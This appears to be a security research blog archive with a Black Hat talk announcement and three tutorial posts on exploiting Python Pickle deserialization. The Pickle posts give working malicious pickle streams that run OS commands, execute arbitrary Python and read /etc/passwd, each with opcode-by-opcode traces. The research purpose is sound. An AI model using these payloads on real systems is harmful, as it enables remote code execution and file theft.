Grey bar Blue bar
Share this:

Sat, 1 Jun 2013

Honey, I’m home!! - Hacking Z-Wave & other Black Hat news

You've probably never thought of this, but the home automation market in the US was worth approximately $3.2 billion in 2010 and is expected to exceed $5.5 billion in 2016.

Under the hood, the Zigbee and Z-wave wireless communication protocols are the most common used RF technology in home automation systems. Zigbee is based on an open specification (IEEE 802.15.4) and has been the subject of several academic and practical security researches. Z-wave is a proprietary wireless protocol that works in the Industrial, Scientific and Medical radio band (ISM). It transmits on the 868.42 MHz (Europe) and 908.42MHz (United States) frequencies designed for low-bandwidth data communications in embedded devices such as security sensors, alarms and home automation control panels.

Unlike Zigbee, almost no public security research has been done on the Z-Wave protocol except once during a DefCon 2011 talk when the presenter pointed to the possibility of capturing the AES key exchange ... until now. Our Black Hat USA 2013 talk explores the question of Z-Wave protocol security and show how the Z-Wave protocol can be subjected to attacks.

The talk is being presented by Behrang Fouladi a Principal Security Researcher at SensePost, with some help on the hardware side from our friend Sahand Ghanoun. Behrang is one of our most senior and most respected analysts. He loves poetry, movies with Owen Wilson, snowboarding and long walks on the beach. Wait - no - that's me. Behrang's the guy who lives in London and has a Masters from Royal Holloway. He's also the guy who figured how to clone the SecureID software token.

Amazingly, this is the 11th time we've presented at Black Hat Las Vegas. We try and keep track of our talks and papers at conferences on our research services site, but for your reading convenience, here's a summary of our Black Hat talks over the last decade:

2002: Setiri : Advances in trojan technology (Roelof Temmingh)

Setiri was the first publicized trojan to implement the concept of using a web browser to communicate with its controller and caused a stir when we presented it in 2002. We were also very pleased when it got referenced by in a 2004 book by Ed Skoudis.

2003: Putting the tea back into cyber terrorism (Charl van der Walt, Roelof Temmingh and Haroon Meer)

A paper about targeted, effective, automated attacks that could be used in countrywide cyber terrorism. A worm that targets internal networks was also discussed as an example of such an attack. In some ways, the thinking in this talk eventually lead to the creation of Maltego.

2004: When the tables turn (Charl van der Walt, Roelof Temmingh and Haroon Meer)

This paper presented some of the earliest ideas on offensive strike-back as a network defence methodology, which later found their way into Neil Wyler's 2005 book "Aggressive Network Self-Defence".

2005: Assessment automation (Roelof Temmingh)

Our thinking around pentest automation, and in particular footprinting and link analyses was further expanded upon. Here we also released the first version of our automated footprinting tool - "Bidiblah".

2006: A tail of two proxies (Roelof Temmingh and Haroon Meer)

In this talk we literally did introduce two proxy tools. The first was "Suru', our HTTP MITM proxy and a then-contender to the @stake Web Proxy. Although Suru has long since been bypassed by excellent tools like "Burp Proxy" it introduced a number of exciting new concepts, including trivial fuzzing, token correlation and background directory brute-forcing. Further improvements included timing analysis and indexable directory checks. These were not available in other commercial proxies at the time, hence our need to write our own.

Another pioneering MITM proxy - WebScarab from OWASP - also shifted thinking at the time. It was originally written by Rogan Dawes, our very own pentest team leader.

The second proxy we introduced operated at the TCP layer, leveraging off the very excellent Scappy packet manipulation program. We never took that any further, however.

2007: It's all about timing (Haroon Meer and Marco Slaviero)

This was one of my favourite SensePost talks. It kicked off a series of research projects concentrating on timing-based inference attacks against all kinds of technologies and introduced a weaponized timing-based data exfiltration attack in the form of our Squeeza SQL Injection exploitation tool (you probably have to be South African to get the joke). This was also the first talk in which we Invented Our Own Acronym.

2008: Pushing a camel through the eye of a needle (Haroon Meer, Marco Slaviero & Glenn Wilkinson)

In this talk we expanded on our ideas of using timing as a vector for data extraction in so-called 'hostile' environments. We also introduced our 'reDuh' TCP-over-HTTP tunnelling tool. reDuh is a tool that can be used to create a TCP circuit through validly formed HTTP requests. Essentially this means that if we can upload a JSP/PHP/ASP page onto a compromised server, we can connect to hosts behind that server trivially. We also demonstrated how reDuh could be implemented under OLE right inside a compromised SQL 2005 server, even without 'sa' privileges.

2009: Clobbering the cloud (Haroon Meer, Marco Slaviero and Nicholas Arvanitis)

Yup, we did cloud before cloud was cool. This was a presentation about security in the cloud. Cloud security issues such as privacy, monoculture and vendor lock-in are discussed. The cloud offerings from Amazon, Salesforce and Apple as well as their security were examined. We got an email from Steve "Woz" Wozniak, we quoted Dan Geer and we had a photo of Dino Daizovi. We built an HTTP brute-forcer on and (best of all) we hacked Apple using an iPhone.

2010: Cache on delivery (Marco Slaviero)

This was a presentation about mining information from memcached. We introduced go-derper.rb, a tool we developed for hacking memcached servers and gave a few examples, including a sexy hack of It seemed like people weren't getting our point at first, but later the penny dropped and we've to-date had almost 50,000 hits on the presentation on Slideshare.

2011: Sour pickles (Marco Slaviero)

Python's Pickle module provides a known capability for running arbitrary Python functions and, by extension, permitting remote code execution; however there is no public Pickle exploitation guide and published exploits are simple examples only. In this paper we described the Pickle environment, outline hurdles facing a shellcoder and provide guidelines for writing Pickle shellcode. A brief survey of public Python code was undertaken to establish the prevalence of the vulnerability, and a shellcode generator and Pickle mangler were written. Output from the paper included helpful guidelines and templates for shellcode writing, tools for Pickle hacking and a shellcode library.We also wrote a very fancy paper about it all...

We never presented at Black Hat USA in 2012, although we did do some very cool work in that year.

For this year's show we'll back on the podium with Behrang's talk, as well an entire suite of excellent training courses. To meet the likes of Behrang and the rest of our team please consider one of our courses. We need all the support we can get and we're pretty convinced you won't be disappointed.

See you in Vegas!

Mon, 8 Aug 2011

BlackHat 2011 Presentation

On this past Thursday we spoke at BlackHat USA on Python Pickle. In the presentation, we covered approaches for implementing missing functionality in Pickle, automating the conversion of Python calls into Pickle opcodes, scenarios in which attacks are possible and guidelines for writing shellcode. Two tools were released:

  1. — automates conversion from Python-like statements into shellcode.
  2. Anapickle — helps with the creation of malicious pickles. Contains the shellcode library.
Lastly, we demonstrated bugs in a library, a piece of security software, typical web apps, peer-to-peer software and a privesc bug on RHEL6.

Slides are available below, the whitepaper is here and tools here.

Thu, 24 Feb 2011

Playing with Python Pickle #3

[This is the third in a series of posts on Pickle. Link to part one and two.]

Thanks for stopping by. This is the third posting on the bowels of Python Pickle, and it's going to get a little more complicated before it gets easier. In the previous two entries I introduced Pickle as an attack vector present in many memcached instances, and documented tricks for executing OS commands across Python versions as well as a mechanism for generically calling class instance methods from within the Pickle VM.

In this post we'll look at executing pure Python code from within a Pickle steram. While running os.system() or one of its cousins is almost always a necessity, having access to a Python interpreter means that your exploits can be that much more efficient (skip on the Shell syntax, slightly more portable exploits). I imagine one would tend to combine the pure Python with os.system() calls.

Normal execution of pure Python

Dynamic Python execution is normally acheived through the 'exec' statement. However, since 'exec' is a Python statement and not a class method, the depickler knows nothing about 'exec'. __builtin__.eval() on the other hand is a method that the depickler can call; however eval() normally takes an expression only. Thus,

eval("import os; os.system('ls'))

fails. It's worth noting that one can still call methods in expressions, so


can work if the 'os' module is present in the environment. If it isn't, you can still import 'os' with the expression:


or even execute a full code block with a double eval():

eval('eval(compile("import os;os.system(\\"ls\\")","q","exec"))')

Moral of that story: don't ever eval() untrusted input. Obviously.

However, we want to execute not only expressions but full Python scripts. eval() will also accept a code object, which is produced by compile(), and compile() will accept a full Python script. For example, to prove execution here's the venerable timed wait:

cmd = "import os; f=os.popen('sleep 10');" c = compile(cmd,"foo","exec") eval(c)

Reaching into eval'ed code

Continuing with eval(), we try a similar example except we execute 'ls' instead of sleep (and do it in one line of Python). There's an important distinction here, and that is the return value of eval; notice how 'ls' returns nothing:

>>> ret=eval(compile("import os; f=os.popen('ls');","foo","exec")) >>> print ret None

This is because eval() always returns "None" if the supplied code object was compiled with "exec" and means we need a different trick for extracting contents of the eval'ed script. Luckily our first idea worked (yay), so we didn't look further; there may be better/faster/easier options. That idea was to modify the script's globals (variables scoped for the entire script) inside the eval() call, and access globals outside the eval() calls. This works, as globals are passed into eval() and changes reflects after the call returns:

>>> print smashed Traceback (most recent call last): File "", line 1, in NameError: name 'smashed' is not defined >>> eval(compile("import os; f=os.popen('ls');","foo","exec")) >>> print smashed Desktop Documents Downloads Library Movies Music ...

Converting to Pickle

In the example above, the global "smashed" is created inside eval(), and carried into the outer environment. It is quite easy to convert the eval(compile()) pattern into a Pickle:

c__builtin__ eval (c__builtin__ compile (S'import os\\np=os.popen("ls -al")\\\\n' S"" S"exec" tRc__builtin__ globals )RtRc__builtin__ globals )R.

This executes 'ls -al', stores it in the "smashed" global variables and returns the whole globals dict as the end result of depickling. However, it is messy; globals contains other entries which is a waste of space and makes output harder to read. If we're inserting this into a broader pickle, we'd like to have more control (i.e. return a single string) rather than hope that whatever object we are injecting into can handle a dict.

Final exercise

Pickle does not appear to have a way of referencing dict entries (i.e. globals()['smashed'] in Python), so again we have to dig into the docs. The dict builtin supports a "get" method, but requires a class instance... which should sound a little familiar if you still recall the trick from the last post on reading output from os.popen. In Python terms what we're doing is:

code=compile("import os; f=os.popen('ls');","foo","exec") eval(code) __builtin__.apply(__builtin__.getattr(__builtin__.dict,"get"),(__builtin__.globals(),"smashed"))

Converted into Pickle we get:

c__builtin__ eval (c__builtin__ compile (S'import os\\np=os.popen("ls -al")\\\\n' S"" S"exec" tRc__builtin__ globals )RtR0(c__builtin__ globals )RS"smashed" tp0 0c__builtin__ getattr (c__builtin__ dict S"get" tRp1 0c__builtin__ apply (g1 g0 tR.

The execution trace of this Pickle stream is:

  1. 'c' -> find the callable "__builtin__.eval", push it onto the stack [SB] [__builtin__.eval]
  2. '(' -> push a MARK onto the stack [SB] [__builtin__.eval] [MARK]
  3. 'c' -> find the callable "__builtin__.compile", push it onto the stack [SB] [__builtin__.eval] [MARK] [__builtin__.compile]
  4. '(' -> push a MARK onto the stack [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK]
  5. "S'import os\\np=os.popen("ls -al")\\\\n'" -> push 'import os\\np=os.popen("ls -al")\\\\n' onto the stack [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK] ['import os\\np=os.popen("ls -al")\\\\n']
  6. "S''" -> push '' onto the stack [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK] ['import os\\np=os.popen("ls -al")\\\\n'] ['']
  7. "S'exec'" -> push 'exec' onto the stack [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK] ['import os\\np=os.popen("ls -al")\\\\n'] [''] ['exec']
  8. 't' -> pop 'import os\\np=os.popen("ls -al")\\\\n','','exec' and MARK, push ('import os\\np=os.popen("ls -al")\\\\n','','exec') [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [('import os\\np=os.popen("ls -al")\\\\n','','exec')]
  9. 'R' -> pop "__builtin__.compile" and "('import os\\np=os.popen("ls -al")\\\\n','','exec')", call __builtin__.compile('import os\\np=os.popen("ls -al")\\\\n','','exec'), push the code object onto the stack [SB] [__builtin__.eval] [MARK] [code_object]
  10. 'c' -> find the callable "__builtin__.globals", push it onto the stack [SB] [__builtin__.eval] [MARK] [code_object] [__builtin__.globals]
  11. ')' -> push an empty tuple onto the stack [SB] [__builtin__.eval] [MARK] [code_object] [__builtin__.globals] [()]
  12. 'R' -> pop "__builtin__.globals" and "()", call __builtin__.globals(), push the dict onto the stack [SB] [__builtin__.eval] [MARK] [code_object] []
  13. 't' -> pop code_object, and MARK, push (code_object, ) [SB] [__builtin__.eval] [(pop code_object, )]
  14. 'R' -> pop "__builtin__.eval" and "(pop code_object, )", call __builtin__.eval(pop code_object, ), push the None onto the stack [SB] [None]
  15. '0' -> pop None from the stack [SB]
  16. '(' -> push a MARK onto the stack [SB] [MARK]
  17. 'c' -> find the callable "__builtin__.globals", push it onto the stack [SB] [MARK] [__builtin__.globals]
  18. ')' -> push an empty tuple onto the stack [SB] [MARK] [__builtin__.globals] [()]
  19. 'R' -> pop "__builtin__.globals" and "()", call __builtin__.globals(), push the dict onto the stack [SB] [MARK] [<globals dict>]
  20. "S'smashed'" -> push 'smashed' onto the stack [SB] [MARK] [<globals dict>] ['smashed']
  21. 't' -> pop <globals dict>, 'smashed' and MARK, push (, 'smashed') [SB] [(<globals dict>,'smashed')]
  22. 'p0' -> store (<globals dict>, 'smashed') in register 0 [SB] [(<globals dict>,'smashed')]
  23. '0' -> pop (<globals dict>, 'smashed') from the stack [SB]
  24. 'c' -> find the callable "__builtin__.getattr", push it onto the stack [SB] [__builtin__.getattr]
  25. '(' -> push a MARK onto the stack [SB] [__builtin__.getattr] [MARK]
  26. 'c' -> find the callable "__builtin__.dict", push it onto the stack [SB] [__builtin__.getattr] [MARK] [__builtin__.dict]
  27. "S'get'" -> push 'get' onto the stack [SB] [__builtin__.getattr] [MARK] [__builtin__.dict] ['get']
  28. 't' -> pop __builtin__.dict,'get' and MARK, push (__builtin__.dict,'get') [SB] [__builtin__.getattr] (__builtin__.dict,'get')
  29. 'R' -> pop "__builtin__.getattr" and "(__builtin__.dict,'get')", call __builtin__.getattr(__builtin__.dict,'get'), push the attribute onto the stack [SB] [dict.get]
  30. 'p1' -> store dict.get in register 1 [SB] [dict.get]
  31. '0' -> pop dict.get from the stack [SB]
  32. 'c' -> find the callable "__builtin__.apply", push it onto the stack [SB] [__builtin__.apply]
  33. '(' -> push a MARK onto the stack [SB] [__builtin__.apply] [MARK]
  34. 'p1' -> push dict.get from register 1 [SB] [__builtin__.apply] [MARK] [dict.get]
  35. 'p1' -> push (<globals dict>, 'smashed') from register 0 [SB] [__builtin__.apply] [MARK] [dict.get] [(<globals dict>, 'smashed')]
  36. 't' -> pop dict.get,(<globals dict>, 'smashed') and MARK, push [dict.get,(<globals dict>, 'smashed')] [SB] [__builtin__.apply] [(dict.get,(<globals dict>, 'smashed'))]
  37. 'R' -> pop "__builtin__.apply" and "(dict.get,(<globals dict>, 'smashed'))", call __builtin__.apply(dict.get,(<globals dict>, 'smashed')), push the "smashed" value onto the stack [SB] ["Desktop\nDocuments\nDownloads\n..."]
  38. '.' -> pop and return value of "smashed", exit [SB]

Ending off

This post demonstrates a few concepts that are of interest to the Pickle hacker. We showed how to construct a Pickle stream such that arbitrary Python was executed during the deserialization process, we mentioned that it was possible to carry information from within an eval() call into the executing environment of the depickler, and finally we revisited the trick for indirectly calling class instance methods in order to return eval()'s value as the depickled object.

In the last posting on this topic, we'll look at tactical uses for all the Pickle hacking we've covered: where to find Pickle objects, where they're processed and how to modify objects in place. Stay tuned.

Mon, 15 Nov 2010

Playing with Python Pickle #2

[This is the second in a series of posts on Pickle. Link to part one.]

In the previous post I introduced Python's Pickle mechanism for serializing and deserializing data and provided a bit of background regarding where we came across serialized data, how the virtual machine works and noted that Python intentionally does not perform security checks when unpickling.

In this post, we'll work through a number of examples that depict exactly why unpickling untrusted data is a dangerous operation. Since we're going to handcraft Pickle streams, it helps to have an opcode reference handy; here are the opcodes we'll use:

  • c<module>\n<function>\n -> push <module>.<function> onto the stack. It's actually more subtle than this but this simplification works for us.
  • ( -> push a MARK object onto the stack.
  • S'<string>'\n -> Push <string> object onto the stack.
  • V'<string>'\n -> Push Unicode <string> object onto the stack.
  • l -> pop everything off the stack up to the topmost MARK object, create a list with the objects (excl MARK) and push the list back onto the stack
  • t -> pop everything off the stack up to the topmost MARK object, create a tuple with the object (excl MARK) and push the tuple back onto the stack
  • R -> pop two objects off the stack; the top object is treated is an argument and the lower object is a callable (function object). Apply the function to the arguments and push the result back onto the stack
  • p<index>\n -> Peek at the top stack object and store it in memo or register <index>.
  • g<index>\n -> Grab an object from memo or register <index> and push onto the stack.
  • 0 -> Pop and discard the topmost stack item.
  • . -> Terminate the virtual machine. If you're pasting the examples below into larger Pickle streams, make sure to remove the '.'
Executing OS commands

In the previous post, the canonical abuse case for unpickling untrusted data was listed: cos system (S'echo hello world' tR.

Let's step through this (the stack is included after each step, [SB] indicates the stack bottom):

  1. 'c' -> find the callable "os.system", push the callable onto the stack. [SB] [os.system]
  2. '(' -> push a MARK onto the stack [SB] [os.system] [MARK]
  3. "S'echo hello world'" -> push 'echo hello world' onto the stack [SB] [os.system] [MARK] ['echo hello world']
  4. 't' -> pop "echo hello world" and MARK, push the tuple "('echo hello world')" onto the stack [SB] [os.system] [('echo hello world')]
  5. 'R' -> pop "('echo hello world')" and "os.system", call os.system('echo hello world'), push the result back on the stack [SB] [0]
  6. '.' -> pop the result off the stack and terminate [SB], result was '0'

Perhaps one instruction that should be clarified is 'c', which loads a class based on the two arguments 'module' and 'class'. Pickle's docs define the behaviour as follows: "The class object module.class is pushed on the stack. More accurately, the object returned by self.find_class(module, class) is pushed on the stack". Our previous simplified definition said that the 'c' instruction loaded function references, and this is the case, however the full explanation shows that more types than function references can be loaded.

For our purposes we want to load classes that are callable, which is a requirement for the 'R' instruction. A callable is an object that has a "__call__" attribute which, if you're also not a Python programmer, means having to search for more information. An non-expert definition is something like: if the module has functions (e.g. os.system()) then these are suitable for 'c'. However, class instance method objects (x=Foo(); are not suitable for the 'c' opcode since it cannot handle class instances. Also worth pointing out that the 'R' opcode doesn't care about what type of object it executes, so long as the object responds to "__call__". The interplay between 'c' and 'R' is important for the approach shown later, since 'c' is quite limited but 'R' can handle more types of objects.

What this rat-hole concludes with is that we have not come across a Pickle example showing how to execute method calls on class instance objects.


Let's try improve on the command execution example; it's cute for executing commands, but if the unpickling happens on an app server then we won't see the output of "os.system()" since it returns the retval of the shell rather than stdout/stderr. Any output of the command is printed to the server's stdout. Thus for our 'echo hello world' example, the unpickling returns '0' even though the command successfully ran.

Our first goal is to retrieve the output of commands in the reconstructed object. Initial ideas focused on manipulating the shell's return value to carry over output:

cos system (S'printf -v a \'%d\' "\'`uname -a | sed \'s/.\\{2\\}\\(.\\).*/\\1/\'`";exit $a;' tR.

This uses a combination of the shell's backtick and printf statements, sed and exit to return one character at a time in the exit status. However this too is messy; if the output changes between invocations this approach is pretty worthless and it's also noisy and low bandwidth.

The next option was "os.popen", however we quickly became bogged down. "os.popen()" returns an instance (e.g. proc=os.popen("echo foo")) and in order to access the output of the command, we'd need to call "". However, the pickle instruction set doesn't appear to support calling instance methods directly as we've already mentioned. The next option was to look for other modules, and the 'subprocess' module did the trick with it's 'check_output()' function, which takes an executable and a set of arguments, runs the executable on the arguments and returns the contents as a string:

csubprocess check_output (S'uname' tR.



This looks like good news in that we're executing commands and viewing output, however the downsides quickly become apparent. "subprocess.check_output" does not invoke a shell, so we can't simply pass in "uname -a" as a single string, it needs to be broken up into arguments. More importantly though, "check_output" was only added in Python 2.7, so with earlier versions this won't work. We can easily overcome the first of these hurdles; "check_output" will take arguments specified in a list like so:

subprocess.check_output(["uname", "-a"])

We just need to craft the instructions to create a list and leave it on the stack:

csubprocess check_output ((S'uname' S'-a' ltR. This is identical to the previous example except for the additional MARK instruction '(', the '-a' string argument and the 'l' instruction to build a list from the previous MARK. This is a rough execution trace of the VM on the instruction sequence:

  1. 'c' -> find the callable "subprocess.check_output", push the callable onto the stack. [SB] [subprocess.check_output]
  2. '(' -> push a MARK onto the stack [SB] [subprocess.check_output] [MARK]
  3. '(' -> push a MARK onto the stack [SB] [subprocess.check_output] [MARK] [MARK]
  4. "S'uname'" -> push 'uname' onto the stack [SB] [subprocess.check_output] [MARK] [MARK] ['uname']
  5. "S'-a'" -> push '-a' onto the stack [SB] [subprocess.check_output] [MARK] [MARK] ['uname'] ['-a']
  6. 'l' -> pop "uname", "-a" and MARK, push the list "['uname','-a']" onto the stack [SB] [subprocess.check_output] [MARK] [['uname','-a']]
  7. 't' -> pop "['uname','-a']" and MARK, push the tuple "(['uname','-a'])" onto the stack [SB] [subprocess.check_output] [(['uname','-a'])]
  8. 'R' -> pop "(['uname','-a'])" and "subprocess.check_output()", call subprocess.check_output((['uname','-a'])), push the result back on the stack [SB] ['Darwin insurrection.local 10.4.0 Darwin Kernel Version 10.4.0: Fri Apr 23 18:28:53 PDT 2010; root:xnu-1504.7.4~1/RELEASE_I386 i386\n']
  9. '.' -> pop the result off the stack and terminate [SB], result was 'Darwin insurrection.local 10.4.0 Darwin Kernel Version 10.4.0: Fri Apr 23 18:28:53 PDT 2010; root:xnu-1504.7.4~1/RELEASE_I386 i386\n'
The result unfortunately carries a trailing newline, which is ugly. We can make use of the virtual machine to clean up the output for us, by calling "string.strip()" on the output:

cstring strip (csubprocess check_output ((S'uname' S'-a' ltRtR.

The trace has been omitted since it just includes another function call, but the approach hints at how one might go about dealing with class instances: attempt to call a module function on the class instance.

If the "check_output" method is relied upon, then we're still stuck with Python 2.7. Ideally we'd like to run "p=os.popen('ls -al');", however since the 'c' instruction required modules and classes, and could not handle class instances, it was not possible to perform this directly. It bears repetition though that the 'R' instruction could handle references to instance methods, since they are inherently callable. Thus we need to find a way to call an instance method using only functions. Cue a diversion into Python's introspection support:

  • __builtin__.getattr(foo, "attribute") returns foo.attr. e.g. __builtin__.getattr(file, "read") ->
  • __builtin__.apply(func, [args]) executes func([args])
Using the introspection tricks and without calling methods on class instances explicitly, we can execute "p=os.popen('ls -al');" with the following Python:

__builtin__.apply(__builtin__.getattr(file,"read"),[os.popen("ls -al")])

Converted into Pickle, this becomes:

cos popen (S'ls -al' tRp0 0c__builtin__ getattr (c__builtin__ file S"read" tRp1 0c__builtin__ apply (g1 (g0 ltR.

That's quite a mouthful, here's the breakdown:

  1. 'c' -> find the callable "os.popen", push it onto the stack [SB] [os.popen]
  2. '(' -> push a MARK onto the stack [SB] [os.popen] [MARK]
  3. "S'ls -al'" -> push 'ls -al' onto the stack [SB] [os.popen] [MARK] ['ls -al']
  4. 't' -> pop 'ls -al' and MARK, push ('ls -al') [SB] [os.popen] [('ls -al')]
  5. 'R' -> pop "os.popen" and "('ls -al')", call os.popen('ls -al'), push the opened file object onto the stack [SB] [<open file>]
  6. 'p0' -> store "<open file>" in register 0 [SB] [<open file>]
  7. '0' -> pop and discard topmost stack item [SB]
  8. 'c' -> find the callable '__builtin__.getattr', push it onto the stack [SB] [__builtin__.getattr]
  9. '(' -> push a MARK onto the stack [SB] [__builtin__.getattr] [MARK]
  10. 'c' -> find the callable '__builtin__.file', push it onto the stack [SB] [__builtin__.getattr] [MARK] [__builtin__.file]
  11. "S'read'" -> push 'read' onto the stack [SB] [__builtin__.getattr] [MARK] [__builtin__.file] ['read']
  12. 't' -> pop 'read', "__builtin__.file" and MARK, push (__builtin__.file, 'read') [SB] [__builtin__.getattr] [(__builtin__.file, 'read')]
  13. 'R' -> pop "__builtin__.getattr" and "(__builtin__.file, 'read')", call __builtin__.getattr(__builtin__.file, 'read'), push the returned object onto the stack [SB] [<method object for ''>]
  14. 'p1' -> store "<method object for ''>" in register 1 [SB] [<method object for ''>]
  15. '0' -> pop and discard topmost stack item [SB]
  16. 'c' -> find the callable '__builtin__.apply', push it onto the stack [SB] [__builtin__.apply]
  17. '(' -> push a MARK onto the stack [SB] [__builtin__.apply] [MARK]
  18. 'g1' -> retrive contents of register 1, push onto stack [SB] [__builtin__.apply] [MARK] [<method object for ''>]
  19. '(' -> push a MARK onto the stack [SB] [__builtin__.apply] [MARK] [<method object for ''>] [MARK]
  20. 'g0' -> retrive contents of register 0, push onto stack [SB] [__builtin__.apply] [MARK] [<method object for ''>] [MARK] [<open file>]
  21. 'l' -> pop "<open file>" and MARK, push the list "[<open file>]" [SB] [__builtin__.apply] [MARK] [<method object for ''>] [[<open file>]]
  22. 't' -> pop '<method object for '<'>', "[<open file>]" and MARK, push the tuple "(<'>, '[<open file>])" [SB] [__builtin__.apply] [(<method object for ''>,[<open file>])]
  23. 'R' -> pop "__builtin__.apply" and "(<method object for ''>,[<open file>])", call __builtin__.apply(<method object for ''>,[<open file>]), push the returned object onto the stack [SB] ['lrwxr-xr-x@ 1 root wheel 11 Mar 7 2010 /tmp -> private/tmp\n']
  24. '.' -> pop the result off the stack and terminate [SB], returned string was "lrwxr-xr-x@ 1 root wheel 11 Mar 7 2010 /tmp -> private/tmp\n"
This is really useful, since we can now return command output in any Python version that supports Pickle.

That's enough Pickle for today, I'll leave you with a final modification of the above pickle string, that reads and returns the contents of files:

c__builtin__ file (S"/etc/passwd" tRp0 0c__builtin__ getattr (c__builtin__ file S"read" tRp1 0c__builtin__ apply (g1 (g0 ltR.

Tue, 9 Nov 2010

Playing with Python Pickle #1

In our recent memcached investigations (a blog post is still in the wings) we came across numerous caches storing serialized data. The caches were not homogenous and so the data was quite varied: Java objects, ActiveRecord objects from RoR, JSON, pre-rendered HTML, .Net serialized objects and serialized Python objects. Serialized objects can be useful to an attacker from a number of standpoints: such objects could expose data where naive developers make use of the objects to hold secrets and rely on the user to proxy the objects to various parts of an application. In addition, altering serialized objects could impact on the deserialization process, leading to compromise of the system on which the deserialization takes place.

In all the caches we examined, the most common data format found (apart from HTML snippets) was serialized Python and this prompted a brief investigation into the possible attacks against serialized Python objects. We've put together a couple of posts explaining how one might go about exploiting Pickle strings; the obvious vector is memcached however anytime Pickle strings are passed to an untrusted party the attacks described here become useful.


Python implements a default serialization technique called Pickle. Now I don't pretend to be a Pickle expert; Python is not my script language of choice for starters and serialization is not particularly interesting subject to me, however seeing the following in any docs is cause for further digging:

A little further down the same page, we find a trivial example of how to execute code from a Pickle stream and a quick Google leads to a blog post in which Pickle insecurities are fleshed out in more detail. Both are worthwhile reads.

From these sources emerge the following factoids:

  • Pickle streams (or strings) are not simply data formats, they can reconstruct arbitrary Python objects.
  • Objects are described as a sequence of instructions and data stored in a stream of mostly 7-bit chars (newer version of the Pickle protocol support 8-bit opcodes too).
  • The stream is deserialized by a simple virtual machine. Features of the machine are that it is stack-based, includes memo storage (these are registers accessible in any scope), and can call Python callables. There are no branching or looping instructions.
  • Once the virtual machine has processed a complete set of instructions, the final deserialized object returned to the caller is whatever single object remains on the stack. Errors are produced if the final stack is empty or contains more than one item, or if the instruction sequence is malformed or terminates before the end of the serialized data.
  • Since Python 2.3, any semblance of protection in the Pickle code has been removed. Python developers have explicitly stated that the effort required to implement proper security in Pickle exceeds the usefulness of such an exercise and to underline this point they have removed all security controls that were present.

This last point was particularly intriguing; developers purposely removed any semblance of security from the depickling mechanism and exhort users to never deserialize untrusted data. However, the memcached work showed that if one could find memcached instances, it was possible to overwrite data within the cache trivially. If data inside a cache was comprised of Pickle strings, then by overwriting them an attacker is able to inject untrusted Pickle objects into a deserialization operation.

We've had a bit of fun with this seeing how far it can be pushed and over the coming days, I'll post three more entries on this topic. In the mean time, here's some background and a few simple examples to get things going.

Following along

In order to understand the Pickle objects below, you'll need to follow a few basic opcodes and their arguments:

  • c<module>\n<function>\n -> push <module>.<function> onto the stack. There are subtleties here, but for the most part it works.
  • ( -> push a MARK object onto the stack.
  • S'<string>'\n -> Push <string> object onto the stack.
  • V'<string>'\n -> Push Unicode <string> object onto the stack.
  • l -> pop everything off the stack up to the topmost MARK object, create a list with the objects (excl MARK) and push the list back onto the stack
  • t -> pop everything off the stack up to the topmost MARK object, create a tuple with the object (excl MARK) and push the tuple back onto the stack
  • R -> pop two objects off the stack; the top object is treated is an argument and the lower object is a callable (function object). Apply the function to the arguments and push the result back onto the stack
  • p<index>\n -> Peek at the top stack object and store it in memo <index>.
  • g<index>\n -> Grab an object from memo <index> and push onto the stack.
  • 0 -> Pop and discard the topmost stack item.
  • . -> Terminate the virtual machine
With these simple instructions it's possible to execute arbitrary Python code, call OS commands and delve into the currently running Python process, as we'll show in the next couple of posts. I should also mention that the virtual machine supports a bunch of other instructions and these are well documented in, however for the sake of keeping things simple I've only mentioned instructions that we'll actually touch.

Getting started

Testing out Pickle objects is pretty simple:

import pickle str="""S'Hello world' .""" pickle.loads(str)

(All the Pickle strings we'll play with can be substituted in for "str". Note that Pickle is sensitive to spacing and newlines, so don't introduce extras.)
The pickled data "S'Hello World'" simply instructs the VM to push a "Hello World" string object onto the stack. The final "." pops the stack and returns whatever is present.

An important instruction is the MARK opcode "(", which is used to signify frames on the stack. It is normally used in conjunction with opcodes that have to pop multiple objects off the stack, for example opcodes that build lists, tuples or dicts. The two examples below show how a list and a tuple are produced:

(S'Hello' S'World' l.




(S'Hello' S'World' t.



Final example

The canonical example given in a number of places including the official Python docs as to why unpickling untrusted data is bad is:

cos system (S'echo hello world' tR. The intent is clear however the interesting bit is twofold: decoding the instructions used and realizing that for an attacker, "hello world" isn't all that useful. In the next post I'll introduce the basics behind calling functions and see whether we can extend the canonical example into something a little more evil.